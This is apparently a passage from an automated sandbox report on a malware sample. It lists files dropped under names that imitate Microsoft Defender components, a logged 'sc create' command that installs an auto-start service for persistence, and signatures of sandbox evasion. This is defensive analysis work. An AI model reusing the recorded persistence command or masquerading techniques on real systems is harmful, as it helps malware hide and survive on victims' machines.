          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpOAV.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpProvider.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCommu.dllJump to dropped file
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeFile created: C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\NisSrv.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ExtraJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Extra\Stand.lnkJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043BAC70 IsIconic,7_2_043BAC70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043BACF4 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,7_2_043BACF4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480ACF4 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,11_2_0480ACF4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480AC70 IsIconic,11_2_0480AC70
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeStalling execution: Execution stalls by calling Sleepgraph_11-12929
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1871Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1519Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpRtp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\EppManifest.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpOAV.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetours.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpSvc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpProvider.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCommu.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJump to dropped file
